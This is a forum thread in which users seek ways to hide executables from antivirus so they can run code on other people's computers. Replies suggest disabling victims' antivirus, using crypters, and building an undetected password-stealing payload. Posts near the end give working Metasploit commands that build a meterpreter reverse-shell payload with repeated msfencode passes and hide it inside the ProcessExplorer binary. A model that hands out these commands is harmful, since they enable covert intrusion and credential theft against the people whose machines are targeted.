[Question] Executable Obfuscation?

[overwraith]

I was thinking it would be really awesome if we could reuse some of the executables from the USB Hacksaw, and Switchblade. Does anyone know of any good (but free) program execuable obfuscation software?

[Goddish]

[overwraith]

Some of the problems with some of the tools though was that they were always picked up by antivirus. What I am asking is if there is a program that transforms the executables making them hard for the antivirus to discover.Obfuscation uses different tactics to make code hard to reverse engineer, and by extension hard to match to heuristics, and virus databases.

Edited December 10, 2012 by overwraith

[Goddish]

You could disable or uninstall their AV with the duck(maybe stop the services?). i don't know a whole lot about this but you could pack the files

too.

http://www.ehow.com/...es-windows.html

http://wiki.answers.com/Q/How_to_shut_down_avg_antivirus

It kinda really depends on which antivirus you wanna workaround

Edited December 10, 2012 by Goddish

[overwraith]

yeah, but the point is to make code that can be executed on other peoples computers, you know "hacking".

[Goddish]

yeah, but the point is to make code that can be executed on other peoples computers, you know "hacking".

If you know of a method of grabbing passwords in C# or vb.net that doesn't set off AVs PM me and we'll get to work

[Goddish]

I think i may have found a way to make it undetected.

I'll be working on a release for tomorrow evening, a password payload that isn't detected and doesn't use nirsoft...

Edited December 10, 2012 by Goddish

[overwraith]

But do you know what obfuscation is in relation to EXEs? It actually takes advantage of things like fake conditional branches to confuse reverse engineers, and change the appearance of the executable to the antivirus programs.

[bingowings85]

add an exception in the AV software to ignore that file/folder.

[overwraith]

Everybody! The point in this is not to make an exception in the antivirus program, the point is to run the executables through a program that skews the code in such a way that it makes the code hard to recognize by antivirus. I was simply asking if anyone knew of any programs that do this. I know they exist. Virus writers use setups that can create thousands of different compilations of their code, all slightly different.

[Goddish]

They are called crypters and there are thousands of them, all the good ones cost money, they get patched daily by AVs and you have to pay for an updating subscription to a good not well know crypter. If you know someone who has one you can give them your stub and get them to crypt it for you.

Unless you know how to write a program to pack files yourself that's your best option.

[Sud0x3]

You will find that questions along these lines do not get answered, reason being that there are many ways to do this and it is relatively easy when you know what your doing. Il give you a hint, metasploit is capable of doing what your asking.

Edited December 14, 2012 by Sud0x3

[overwraith]

Ok, thanks I will get a metasploit book.

[Sud0x3]

Ok, thanks I will get a metasploit book.

Heres some reading material to get you started :)

http://schierlm.users.sourceforge.net/avevasion.html

http://adaywithtape.blogspot.nl/2010/05/creating-backdoored-exe-with-metasploit.html

[CaptainHooligan]

Why not just use msfencode?

[no42]

msfencode is slightly outdated, msfvenom is newer (and combines msfpayload and msfencode)

But typically, decent AV's detect all metasploit code

[Xcellerator]

AVs do not detect metasploit code. If you're making binaries, they detect the stagers (the exes that carry the initial code) Try for yourself, lower your AV, run a meterpreter binary, make sure the shell is open, then restart your AV.

What do you see? The binary gets quarantined, but the meterpreter code itself runs in memory and isn't detected.

Using a custom EXE template is usually your best bet, or even better, a custom EXE with a lesser used payload (windows_add_user) or learn shellcode and write your own.

[CaptainHooligan]

I've never had an issue when obfuscating code with msfencode. I just use two or three passes and use at least two encoders. For example:

msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=31337 R | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/alpha_upper -c 2 -t raw | msfencode -e x86/shikata_ga_nai -c 5 -t raw | msfencode -e x86/coundown -c 5 -t exe payload.exe
[/CODE]

That sometimes still gets caught which is when I use a custom template which isn't too hard to do. Any windows executable can be used as a template. ProcessExplorer is an easy one to get your hands on and systinternals has a free download. All you need to do to run that is:

[CODE]
wget http://download.sysinternals.com/Files/ProcessExplorer.zip
unzip ProcessExplorer.zip
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=31337 R | msfencode -t exe -x procexp.exe (This is the ProcessExplorer executable from zip) -o payload.exe -e x86/shikata_ga_nai -c 5
[/CODE]

As was mentioned in previous posts msfvenom is more updated than msfencode but when using a custom template (any windows executable) usually there is no problem at all bypassing AV.

[Xcellerator]

What CaptainHooligan says above is right, most AVs get thrown by a custom template. Some of the tougher ones (like Avast or AVG) still can pick them up.

[--nick--]

is there a link to a guide on making a custom .exe? id like to take a look.

[Xcellerator]

The idea isn't to make a custom EXE, but to USE one. If you want to MAKE a custom EXE, fire up Notepad++ and your favourite compiler and get coding.

If you want to USE a custom EXE (ie not the default one bundled with metasploit), then you can use the '-x' option with 'msfvenom'.. There are other ways, but I find that to be the easiest.

Just remember to spawn a listener in metasploit if you need one!